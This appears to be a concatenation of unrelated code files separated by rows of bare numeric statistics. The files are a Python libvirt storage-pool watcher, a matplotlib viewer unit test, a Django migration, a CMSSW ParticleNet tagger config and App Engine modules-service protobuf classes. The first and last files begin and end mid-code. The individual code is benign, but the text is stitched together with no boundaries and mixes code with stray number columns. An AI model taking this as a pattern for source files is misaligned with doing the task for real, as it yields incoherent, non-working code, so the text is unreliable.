for ob in VMD_TEMPLATE_DIR:
if not os.path.exists(ob[1]):
os.makedirs(ob[1], 0x0711)
try:
runCmdRaiseException('virsh pool-create-as --name %s --type dir --target %s' % (ob[0], ob[1]))
except:
os.removedirs(ob[1])
logger.error('Oops! ', exc_info=1)
event_handler = VmdImageLibvirtXmlEventHandler(ob[0], ob[1], GROUP, VERSION,
PLURAL_VM_DISK_IMAGE)
observer.schedule(event_handler, ob[1], True)
observer.start()
OLD_PATH_WATCHERS = {}
while True:
try:
paths = _get_all_pool_path()
for pool_name, pool_path in paths.items():
content_file = '%s/content' % pool_path
if os.path.exists(content_file):
with open(content_file, 'r') as fr:
pool_content = fr.read().strip()
if pool_content != 'vmd':
del paths[pool_name]
# unschedule not exist pool path
watchers = {}
for path in OLD_PATH_WATCHERS.keys():
if path not in paths.values():
observer.unschedule(OLD_PATH_WATCHERS[path])
else:
watchers[path] = OLD_PATH_WATCHERS[path]
OLD_PATH_WATCHERS = watchers
for pool in paths.keys():
# schedule new pool path
if paths[pool] not in OLD_PATH_WATCHERS.keys() and os.path.isdir(paths[pool]):
logger.debug(paths[pool])
event_handler = VmVolEventHandler(pool, paths[pool], GROUP, VERSION,
PLURAL_VM_DISK)
watcher = observer.schedule(event_handler, paths[pool], True)
OLD_PATH_WATCHERS[paths[pool]] = watcher
except Exception as e:
logger.debug(traceback.print_exc())
logger.debug("error occur when watch all storage pool")
time.sleep(3)
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
except:
logger.warning('Oops! ', exc_info=1)
observer.join()
if __name__ == "__main__":
config.load_kube_config(config_file=TOKEN)
while True:
try:
main()
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1:
config.load_kube_config(config_file=TOKEN)
info=sys.exc_info()
logger.error('Oops! ', exc_info=1)
time.sleep(5)
continue
| 47.332834
| 206
| 0.524548
| 6,309
| 63,142
| 5.096529
| 0.048344
| 0.030696
| 0.062698
| 0.036201
| 0.859862
| 0.849257
| 0.843814
| 0.831281
| 0.823506
| 0.813927
| 0
| 0.008628
| 0.363039
| 63,142
| 1,333
| 207
| 47.368342
| 0.790845
| 0.390643
| 0
| 0.792105
| 0
| 0
| 0.101332
| 0
| 0
| 0
| 0.000318
| 0
| 0
| 1
| 0.048684
| false
| 0.006579
| 0.023684
| 0.002632
| 0.088158
| 0.001316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3d63f328fa46da85ad0f8b414087213c70dda102
| 10,600
|
py
|
Python
|
tests/image/test_viewer.py
|
keio-ytlab/researchutils
|
bb3ec467386d43a1e2282ec6d024216ce4dae841
|
[
"MIT"
] | 1
|
2018-10-25T12:57:38.000Z
|
2018-10-25T12:57:38.000Z
|
tests/image/test_viewer.py
|
yuishihara/researchutils
|
bb3ec467386d43a1e2282ec6d024216ce4dae841
|
[
"MIT"
] | 28
|
2018-08-25T03:54:30.000Z
|
2018-10-14T12:09:47.000Z
|
tests/image/test_viewer.py
|
yuishihara/researchutils
|
bb3ec467386d43a1e2282ec6d024216ce4dae841
|
[
"MIT"
] | null | null | null |
import matplotlib
import matplotlib.pyplot
import numpy as np
from researchutils.image import viewer
import pytest
from mock import patch
class TestViewer(object):
def test_create_window(self):
with patch('matplotlib.pyplot.imshow') as mock_imshow:
image = np.ndarray(shape=(28, 28, 3))
viewer._create_window(image=image)
mock_imshow.assert_called_with(image)
viewer._create_window(image=image, is_gray=True)
mock_imshow.assert_called_with(image, cmap='gray')
def test_show_image(self):
with patch('matplotlib.pyplot.imshow') as mock_imshow:
with patch('matplotlib.pyplot.title') as mock_title:
with patch('matplotlib.pyplot.subplot') as mock_subplot:
with patch('matplotlib.pyplot.show') as mock_show:
image = np.ndarray(shape=(28, 28, 3))
title = 'test'
viewer.show_image(image=image, title=title)
mock_imshow.assert_called_with(image)
mock_title.assert_called_with(title)
mock_show.assert_called_once()
def test_show_images(self):
with patch('matplotlib.pyplot.imshow') as mock_imshow:
with patch('matplotlib.pyplot.title') as mock_title:
with patch('matplotlib.pyplot.subplot') as mock_subplot:
with patch('matplotlib.pyplot.show') as mock_show:
image1 = np.ndarray(shape=(28, 28, 3))
image2 = np.ndarray(shape=(28, 28, 3))
images = [image1, image2]
title = 'test'
viewer.show_images(images=images, title=title)
assert mock_imshow.call_count == len(images)
assert mock_title.call_count == len(images)
mock_show.assert_called_once()
def test_show_images_with_comparisons(self):
with patch('matplotlib.pyplot.imshow') as mock_imshow:
with patch('matplotlib.pyplot.title') as mock_title:
with patch('matplotlib.pyplot.subplot') as mock_subplot:
with patch('matplotlib.pyplot.show') as mock_show:
image1 = np.ndarray(shape=(28, 28, 3))
image2 = np.ndarray(shape=(28, 28, 3))
images = [image1, image2]
title = 'test'
image3 = np.ndarray(shape=(28, 28, 3))
image4 = np.ndarray(shape=(28, 28, 3))
comparisons = [image3, image4]
comparison_title = 'comparisons'
viewer.show_images(
images=images, title=title, comparisons=comparisons, comparison_title=comparison_title)
assert mock_imshow.call_count == len(
images) + len(comparisons)
assert mock_title.call_count == len(
images) + len(comparisons)
mock_show.assert_called_once()
def test_animate(self):
with patch('matplotlib.image.AxesImage') as mock_axes:
with patch('matplotlib.pyplot.imshow', return_value=mock_axes) as mock_imshow:
with patch('matplotlib.pyplot.figure') as mock_figure:
with patch('matplotlib.pyplot.show', return_value=mock_axes) as mock_show:
num_frames = 10
images = [np.ndarray(shape=(10, 10, 3))
for i in range(num_frames)]
viewer.animate(images, auto_close=True)
assert mock_imshow.call_count == 1
assert mock_show.call_count == 1
def test_animate_with_comparison(self):
with patch('matplotlib.image.AxesImage') as mock_axes:
with patch('matplotlib.pyplot.imshow', return_value=mock_axes) as mock_imshow:
with patch('matplotlib.pyplot.figure') as mock_figure:
with patch('matplotlib.pyplot.show') as mock_show:
with patch('matplotlib.pyplot.subplot') as mock_subplot:
num_frames = 10
images = [np.ndarray(shape=(10, 10, 3))
for i in range(num_frames)]
viewer.animate(
images=images, comparisons=images, auto_close=True)
assert mock_imshow.call_count == 2
assert mock_subplot.call_count == 2
assert mock_show.call_count == 1
def test_animate_unsupoprted_dimension(self):
with patch('matplotlib.image.AxesImage') as mock_axes:
with patch('matplotlib.pyplot.imshow', return_value=mock_axes) as mock_imshow:
with patch('matplotlib.pyplot.figure') as mock_figure:
with patch('matplotlib.pyplot.show') as mock_show:
with patch('matplotlib.pyplot.subplot') as mock_subplot:
num_frames = 10
images = [np.ndarray(shape=(10, 10, 3))
for i in range(num_frames)]
with pytest.raises(ValueError):
viewer.animate(
images=images, comparisons=[[images, images], [images, images]], auto_close=True)
def test_animate_with_many_comparisons(self):
with patch('matplotlib.image.AxesImage') as mock_axes:
with patch('matplotlib.pyplot.imshow', return_value=mock_axes) as mock_imshow:
with patch('matplotlib.pyplot.figure') as mock_figure:
with patch('matplotlib.pyplot.show') as mock_show:
with patch('matplotlib.pyplot.subplot') as mock_subplot:
num_frames = 10
images = [np.ndarray(shape=(10, 10, 3))
for i in range(num_frames)]
viewer.animate(
images=images, comparisons=[images, images], auto_close=True)
assert mock_imshow.call_count == 3
assert mock_subplot.call_count == 3
assert mock_show.call_count == 1
def test_animate_save_gif(self):
with patch('matplotlib.image.AxesImage') as mock_axes:
with patch('matplotlib.pyplot.imshow', return_value=mock_axes) as mock_imshow:
with patch('matplotlib.pyplot.figure') as mock_figure:
with patch('matplotlib.animation.FuncAnimation.save') as mock_save:
with patch('matplotlib.pyplot.show') as mock_show:
num_frames = 10
images = [np.ndarray(shape=(10, 10, 3))
for i in range(num_frames)]
viewer.animate(
images, auto_close=True, save_gif=True)
assert mock_save.call_count == 1
assert mock_imshow.call_count == 1
assert mock_show.call_count == 1
def test_animate_in_matrix_form_1x3(self):
with patch('matplotlib.image.AxesImage') as mock_axes:
with patch('matplotlib.pyplot.imshow', return_value=mock_axes) as mock_imshow:
with patch('matplotlib.pyplot.figure') as mock_figure:
with patch('matplotlib.pyplot.show') as mock_show:
with patch('matplotlib.pyplot.subplot') as mock_subplot:
num_frames = 10
video_frames = [np.ndarray(shape=(10, 10, 3))
for i in range(num_frames)]
videos = [video_frames, video_frames, video_frames]
viewer.animate_in_matrix_form(
videos, auto_close=True, images_per_row=3)
assert mock_imshow.call_count == 3
assert mock_subplot.call_count == 3
assert mock_show.call_count == 1
def test_animate_in_matrix_form_3x1(self):
with patch('matplotlib.image.AxesImage') as mock_axes:
with patch('matplotlib.pyplot.imshow', return_value=mock_axes) as mock_imshow:
with patch('matplotlib.pyplot.figure') as mock_figure:
with patch('matplotlib.pyplot.show') as mock_show:
with patch('matplotlib.pyplot.subplot') as mock_subplot:
num_frames = 10
video_frames = [np.ndarray(shape=(10, 10, 3))
for i in range(num_frames)]
videos = [video_frames, video_frames, video_frames]
viewer.animate_in_matrix_form(
videos, auto_close=True, images_per_row=1)
assert mock_imshow.call_count == 3
assert mock_subplot.call_count == 3
assert mock_show.call_count == 1
def test_animate_in_matrix_form_images_per_row_none(self):
with patch('matplotlib.image.AxesImage') as mock_axes:
with patch('matplotlib.pyplot.imshow', return_value=mock_axes) as mock_imshow:
with patch('matplotlib.pyplot.figure') as mock_figure:
with patch('matplotlib.pyplot.show') as mock_show:
with patch('matplotlib.pyplot.subplot') as mock_subplot:
num_frames = 10
video_frames = [np.ndarray(shape=(10, 10, 3))
for i in range(num_frames)]
videos = [video_frames, video_frames, video_frames]
viewer.animate_in_matrix_form(
videos, auto_close=True, images_per_row=None)
assert mock_imshow.call_count == 3
assert mock_subplot.call_count == 3
assert mock_show.call_count == 1
if __name__ == '__main__':
pytest.main()
| 53.535354
| 117
| 0.529906
| 1,107
| 10,600
| 4.846432
| 0.076784
| 0.087232
| 0.184157
| 0.200373
| 0.891519
| 0.865424
| 0.831873
| 0.782665
| 0.762721
| 0.720969
| 0
| 0.020654
| 0.387925
| 10,600
| 197
| 118
| 53.807107
| 0.806258
| 0
| 0
| 0.7
| 0
| 0
| 0.122453
| 0.119151
| 0
| 0
| 0
| 0
| 0.182353
| 1
| 0.070588
| false
| 0
| 0.035294
| 0
| 0.111765
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3d7627e33b9c720428a5db2449456ea643896afa
| 360
|
py
|
Python
|
tests/results.py
|
reed9999/tuneinrecordings
|
58c64bcb16f8e5a0fcdba283cc230ccf48941343
|
[
"MIT"
] | null | null | null |
tests/results.py
|
reed9999/tuneinrecordings
|
58c64bcb16f8e5a0fcdba283cc230ccf48941343
|
[
"MIT"
] | null | null | null |
tests/results.py
|
reed9999/tuneinrecordings
|
58c64bcb16f8e5a0fcdba283cc230ccf48941343
|
[
"MIT"
] | null | null | null |
#Format borrowed from the excellent Django tests
TEST_RESULTS = {
'all_imgs': [
'1521309364.52960/e56200f5bbfbca547aa0712a5c9947aa.image',
'1521320898.1627/60a58df0b9d06ce905b72c371a665d93.image',
'1521323051.57557/60a58df0b9d06ce905b72c371a665d93.image',
'1521323051.57557/60a58df0b9d06ce905b72c371a665d93.image',
]
}
| 32.727273
| 66
| 0.744444
| 27
| 360
| 9.851852
| 0.740741
| 0.417293
| 0.353383
| 0.390977
| 0.530075
| 0.530075
| 0
| 0
| 0
| 0
| 0
| 0.465116
| 0.163889
| 360
| 10
| 67
| 36
| 0.418605
| 0.130556
| 0
| 0.25
| 0
| 0
| 0.727564
| 0.701923
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3d87e6c68a6b9944359a6064a95b654db84aa822
| 1,546
|
py
|
Python
|
allies/migrations/0005_auto_20201215_1647.py
|
kevincornish/HeckGuide
|
eb974d6b589908f5fc2308d41032a48941cc3d21
|
[
"MIT"
] | 4
|
2022-02-16T10:19:11.000Z
|
2022-03-17T03:34:26.000Z
|
allies/migrations/0005_auto_20201215_1647.py
|
kevincornish/HeckGuide
|
eb974d6b589908f5fc2308d41032a48941cc3d21
|
[
"MIT"
] | 1
|
2022-02-17T14:02:31.000Z
|
2022-03-31T03:56:42.000Z
|
allies/migrations/0005_auto_20201215_1647.py
|
kevincornish/HeckGuide
|
eb974d6b589908f5fc2308d41032a48941cc3d21
|
[
"MIT"
] | 3
|
2022-02-17T06:13:52.000Z
|
2022-03-23T21:37:21.000Z
|
# Generated by Django 3.1 on 2020-12-15 21:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('allies', '0004_auto_20201215_1505'),
]
operations = [
migrations.AlterField(
model_name='currentally',
name='cost',
field=models.BigIntegerField(null=True),
),
migrations.AlterField(
model_name='currentally',
name='group_id',
field=models.BigIntegerField(null=True),
),
migrations.AlterField(
model_name='currentally',
name='previous_cost',
field=models.BigIntegerField(null=True),
),
migrations.AlterField(
model_name='currentally',
name='troop_kills',
field=models.BigIntegerField(null=True),
),
migrations.AlterField(
model_name='historicalally',
name='cost',
field=models.BigIntegerField(null=True),
),
migrations.AlterField(
model_name='historicalally',
name='group_id',
field=models.BigIntegerField(null=True),
),
migrations.AlterField(
model_name='historicalally',
name='previous_cost',
field=models.BigIntegerField(null=True),
),
migrations.AlterField(
model_name='historicalally',
name='troop_kills',
field=models.BigIntegerField(null=True),
),
]
| 28.62963
| 52
| 0.560802
| 130
| 1,546
| 6.538462
| 0.307692
| 0.188235
| 0.235294
| 0.272941
| 0.825882
| 0.825882
| 0.778824
| 0.778824
| 0.715294
| 0.715294
| 0
| 0.028958
| 0.329884
| 1,546
| 53
| 53
| 29.169811
| 0.791506
| 0.027814
| 0
| 0.851064
| 1
| 0
| 0.133911
| 0.015323
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.021277
| 0
| 0.085106
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
9a9554e336707615caa279b8a464f09579f039ac
| 4,332
|
py
|
Python
|
RecoBTag/MXNet/python/pfParticleNetDiscriminatorsJetTags_cfi.py
|
gputtley/cmssw
|
c1ef8454804e4ebea8b65f59c4a952a6c94fde3b
|
[
"Apache-2.0"
] | 6
|
2017-09-08T14:12:56.000Z
|
2022-03-09T23:57:01.000Z
|
RecoBTag/MXNet/python/pfParticleNetDiscriminatorsJetTags_cfi.py
|
gputtley/cmssw
|
c1ef8454804e4ebea8b65f59c4a952a6c94fde3b
|
[
"Apache-2.0"
] | 545
|
2017-09-19T17:10:19.000Z
|
2022-03-07T16:55:27.000Z
|
RecoBTag/MXNet/python/pfParticleNetDiscriminatorsJetTags_cfi.py
|
gputtley/cmssw
|
c1ef8454804e4ebea8b65f59c4a952a6c94fde3b
|
[
"Apache-2.0"
] | 14
|
2017-10-04T09:47:21.000Z
|
2019-10-23T18:04:45.000Z
|
import FWCore.ParameterSet.Config as cms
pfParticleNetDiscriminatorsJetTags = cms.EDProducer(
'BTagProbabilityToDiscriminator',
discriminators = cms.VPSet(
cms.PSet(
name = cms.string('TvsQCD'),
numerator = cms.VInputTag(
cms.InputTag('pfParticleNetJetTags', 'probTbcq'),
cms.InputTag('pfParticleNetJetTags', 'probTbqq'),
),
denominator = cms.VInputTag(
cms.InputTag('pfParticleNetJetTags', 'probTbcq'),
cms.InputTag('pfParticleNetJetTags', 'probTbqq'),
cms.InputTag('pfParticleNetJetTags', 'probQCDbb'),
cms.InputTag('pfParticleNetJetTags', 'probQCDcc'),
cms.InputTag('pfParticleNetJetTags', 'probQCDb'),
cms.InputTag('pfParticleNetJetTags', 'probQCDc'),
cms.InputTag('pfParticleNetJetTags', 'probQCDothers'),
),
),
cms.PSet(
name = cms.string('WvsQCD'),
numerator = cms.VInputTag(
cms.InputTag('pfParticleNetJetTags', 'probWcq'),
cms.InputTag('pfParticleNetJetTags', 'probWqq'),
),
denominator = cms.VInputTag(
cms.InputTag('pfParticleNetJetTags', 'probWcq'),
cms.InputTag('pfParticleNetJetTags', 'probWqq'),
cms.InputTag('pfParticleNetJetTags', 'probQCDbb'),
cms.InputTag('pfParticleNetJetTags', 'probQCDcc'),
cms.InputTag('pfParticleNetJetTags', 'probQCDb'),
cms.InputTag('pfParticleNetJetTags', 'probQCDc'),
cms.InputTag('pfParticleNetJetTags', 'probQCDothers'),
),
),
cms.PSet(
name = cms.string('ZvsQCD'),
numerator = cms.VInputTag(
cms.InputTag('pfParticleNetJetTags', 'probZbb'),
cms.InputTag('pfParticleNetJetTags', 'probZcc'),
cms.InputTag('pfParticleNetJetTags', 'probZqq'),
),
denominator = cms.VInputTag(
cms.InputTag('pfParticleNetJetTags', 'probZbb'),
cms.InputTag('pfParticleNetJetTags', 'probZcc'),
cms.InputTag('pfParticleNetJetTags', 'probZqq'),
cms.InputTag('pfParticleNetJetTags', 'probQCDbb'),
cms.InputTag('pfParticleNetJetTags', 'probQCDcc'),
cms.InputTag('pfParticleNetJetTags', 'probQCDb'),
cms.InputTag('pfParticleNetJetTags', 'probQCDc'),
cms.InputTag('pfParticleNetJetTags', 'probQCDothers'),
),
),
cms.PSet(
name = cms.string('ZbbvsQCD'),
numerator = cms.VInputTag(
cms.InputTag('pfParticleNetJetTags', 'probZbb'),
),
denominator = cms.VInputTag(
cms.InputTag('pfParticleNetJetTags', 'probZbb'),
cms.InputTag('pfParticleNetJetTags', 'probQCDbb'),
cms.InputTag('pfParticleNetJetTags', 'probQCDcc'),
cms.InputTag('pfParticleNetJetTags', 'probQCDb'),
cms.InputTag('pfParticleNetJetTags', 'probQCDc'),
cms.InputTag('pfParticleNetJetTags', 'probQCDothers'),
),
),
cms.PSet(
name = cms.string('HbbvsQCD'),
numerator = cms.VInputTag(
cms.InputTag('pfParticleNetJetTags', 'probHbb'),
),
denominator = cms.VInputTag(
cms.InputTag('pfParticleNetJetTags', 'probHbb'),
cms.InputTag('pfParticleNetJetTags', 'probQCDbb'),
cms.InputTag('pfParticleNetJetTags', 'probQCDcc'),
cms.InputTag('pfParticleNetJetTags', 'probQCDb'),
cms.InputTag('pfParticleNetJetTags', 'probQCDc'),
cms.InputTag('pfParticleNetJetTags', 'probQCDothers'),
),
),
cms.PSet(
name = cms.string('H4qvsQCD'),
numerator = cms.VInputTag(
cms.InputTag('pfParticleNetJetTags', 'probHqqqq'),
),
denominator = cms.VInputTag(
cms.InputTag('pfParticleNetJetTags', 'probHqqqq'),
cms.InputTag('pfParticleNetJetTags', 'probQCDbb'),
cms.InputTag('pfParticleNetJetTags', 'probQCDcc'),
cms.InputTag('pfParticleNetJetTags', 'probQCDb'),
cms.InputTag('pfParticleNetJetTags', 'probQCDc'),
cms.InputTag('pfParticleNetJetTags', 'probQCDothers'),
),
),
)
)
| 43.32
| 66
| 0.586334
| 285
| 4,332
| 8.912281
| 0.136842
| 0.216535
| 0.610236
| 0.108661
| 0.930709
| 0.922835
| 0.811024
| 0.784252
| 0.784252
| 0.784252
| 0
| 0.00032
| 0.277701
| 4,332
| 99
| 67
| 43.757576
| 0.811441
| 0
| 0
| 0.877551
| 0
| 0
| 0.346722
| 0.006925
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010204
| 0
| 0.010204
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9acbe2d7d640af5b0eae065bc447d898beede8cc
| 44,960
|
py
|
Python
|
AppServer/google/appengine/api/modules/modules_service_pb.py
|
loftwah/appscale
|
586fc1347ebc743d7a632de698f4dbfb09ae38d6
|
[
"Apache-2.0"
] | 790
|
2015-01-03T02:13:39.000Z
|
2020-05-10T19:53:57.000Z
|
AppServer/google/appengine/api/modules/modules_service_pb.py
|
nlake44/appscale
|
6944af660ca4cb772c9b6c2332ab28e5ef4d849f
|
[
"Apache-2.0"
] | 1,361
|
2015-01-08T23:09:40.000Z
|
2020-04-14T00:03:04.000Z
|
AppServer/google/appengine/api/modules/modules_service_pb.py
|
nlake44/appscale
|
6944af660ca4cb772c9b6c2332ab28e5ef4d849f
|
[
"Apache-2.0"
] | 155
|
2015-01-08T22:59:31.000Z
|
2020-04-08T08:01:53.000Z
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.net.proto import ProtocolBuffer
import array
import dummy_thread as thread
__pychecker__ = """maxreturns=0 maxbranches=0 no-callinit
unusednames=printElemNumber,debug_strs no-special"""
if hasattr(ProtocolBuffer, 'ExtendableProtocolMessage'):
_extension_runtime = True
_ExtendableProtocolMessage = ProtocolBuffer.ExtendableProtocolMessage
else:
_extension_runtime = False
_ExtendableProtocolMessage = ProtocolBuffer.ProtocolMessage
class ModulesServiceError(ProtocolBuffer.ProtocolMessage):
OK = 0
INVALID_MODULE = 1
INVALID_VERSION = 2
INVALID_INSTANCES = 3
TRANSIENT_ERROR = 4
UNEXPECTED_STATE = 5
_ErrorCode_NAMES = {
0: "OK",
1: "INVALID_MODULE",
2: "INVALID_VERSION",
3: "INVALID_INSTANCES",
4: "TRANSIENT_ERROR",
5: "UNEXPECTED_STATE",
}
def ErrorCode_Name(cls, x): return cls._ErrorCode_NAMES.get(x, "")
ErrorCode_Name = classmethod(ErrorCode_Name)
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.ModulesServiceError'
class GetModulesRequest(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.GetModulesRequest'
class GetModulesResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
self.module_ = []
if contents is not None: self.MergeFromString(contents)
def module_size(self): return len(self.module_)
def module_list(self): return self.module_
def module(self, i):
return self.module_[i]
def set_module(self, i, x):
self.module_[i] = x
def add_module(self, x):
self.module_.append(x)
def clear_module(self):
self.module_ = []
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.module_size()): self.add_module(x.module(i))
def Equals(self, x):
if x is self: return 1
if len(self.module_) != len(x.module_): return 0
for e1, e2 in zip(self.module_, x.module_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.module_)
for i in xrange(len(self.module_)): n += self.lengthString(len(self.module_[i]))
return n
def ByteSizePartial(self):
n = 0
n += 1 * len(self.module_)
for i in xrange(len(self.module_)): n += self.lengthString(len(self.module_[i]))
return n
def Clear(self):
self.clear_module()
def OutputUnchecked(self, out):
for i in xrange(len(self.module_)):
out.putVarInt32(10)
out.putPrefixedString(self.module_[i])
def OutputPartial(self, out):
for i in xrange(len(self.module_)):
out.putVarInt32(10)
out.putPrefixedString(self.module_[i])
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.add_module(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.module_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("module%s: %s\n" % (elm, self.DebugFormatString(e)))
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kmodule = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "module",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.GetModulesResponse'
class GetVersionsRequest(ProtocolBuffer.ProtocolMessage):
has_module_ = 0
module_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def module(self): return self.module_
def set_module(self, x):
self.has_module_ = 1
self.module_ = x
def clear_module(self):
if self.has_module_:
self.has_module_ = 0
self.module_ = ""
def has_module(self): return self.has_module_
def MergeFrom(self, x):
assert x is not self
if (x.has_module()): self.set_module(x.module())
def Equals(self, x):
if x is self: return 1
if self.has_module_ != x.has_module_: return 0
if self.has_module_ and self.module_ != x.module_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
return n
def ByteSizePartial(self):
n = 0
if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
return n
def Clear(self):
self.clear_module()
def OutputUnchecked(self, out):
if (self.has_module_):
out.putVarInt32(10)
out.putPrefixedString(self.module_)
def OutputPartial(self, out):
if (self.has_module_):
out.putVarInt32(10)
out.putPrefixedString(self.module_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_module(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_module_: res+=prefix+("module: %s\n" % self.DebugFormatString(self.module_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kmodule = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "module",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.GetVersionsRequest'
class GetVersionsResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
self.version_ = []
if contents is not None: self.MergeFromString(contents)
def version_size(self): return len(self.version_)
def version_list(self): return self.version_
def version(self, i):
return self.version_[i]
def set_version(self, i, x):
self.version_[i] = x
def add_version(self, x):
self.version_.append(x)
def clear_version(self):
self.version_ = []
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.version_size()): self.add_version(x.version(i))
def Equals(self, x):
if x is self: return 1
if len(self.version_) != len(x.version_): return 0
for e1, e2 in zip(self.version_, x.version_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
